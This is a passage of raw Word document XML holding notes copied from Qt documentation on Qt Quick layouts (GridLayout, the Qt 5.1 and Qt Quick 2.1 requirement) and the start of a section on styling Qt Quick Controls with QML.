            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GridLayout</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be resized and its format are customizable through various properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For more information about the layout types, visit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId528" w:history="1">
        <w:r w:rsidR="00821B8B" w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt Quick Layouts Overview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId529" w:history="1">
        <w:r w:rsidR="00821B8B" w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Basic Layouts</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00821B8B" w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00821B8B" w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId530" w:history="1">
        <w:r w:rsidRPr="00C21832">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Layouts</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>was introduced in Qt 5.1 and requires</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId531" w:history="1">
        <w:r w:rsidRPr="00C21832">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00821B8B" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId532" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-styling.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="704" w:name="_Toc483000680"/>
      <w:bookmarkStart w:id="705" w:name="_Toc483003697"/>
      <w:bookmarkStart w:id="706" w:name="_Toc483604032"/>
      <w:bookmarkStart w:id="707" w:name="_Toc483605252"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use Case - Style And Theme Support</w:t>
      </w:r>
      <w:bookmarkEnd w:id="704"/>
      <w:bookmarkEnd w:id="705"/>
      <w:bookmarkEnd w:id="706"/>
      <w:bookmarkEnd w:id="707"/>
    </w:p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C76116">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Styling</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with QML </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>involves creating a visual type and binding that to a property or by directly assigning a value to a property</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For types that incorporate Qt Quick's</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId533" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>delegates</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual type attaches to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C76116">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When using</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId534" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Controls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>controls automatically set the appropriate style</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the respective</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId535" w:history="1">
        <w:r w:rsidRPr="00C76116">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>platforms</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="708" w:name="using-the-styling-qml-types"/>
      <w:bookmarkStart w:id="709" w:name="_Toc483000681"/>
      <w:bookmarkStart w:id="710" w:name="_Toc483003698"/>
      <w:bookmarkStart w:id="711" w:name="_Toc483604033"/>
      <w:bookmarkStart w:id="712" w:name="_Toc483605253"/>
      <w:bookmarkEnd w:id="708"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using the Styling QML Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="709"/>
      <w:bookmarkEnd w:id="710"/>
      <w:bookmarkEnd w:id="711"/>
      <w:bookmarkEnd w:id="712"/>
    </w:p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C76116">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId536" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>controls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to which the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>styling types</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bind. The controls have a corresponding styling type from the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId537" w:history="1">
        <w:r w:rsidRPr="00C21832">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Controls Styles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module. For example,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId538" w:history="1">
        <w:r w:rsidRPr="00C76116">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Button</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
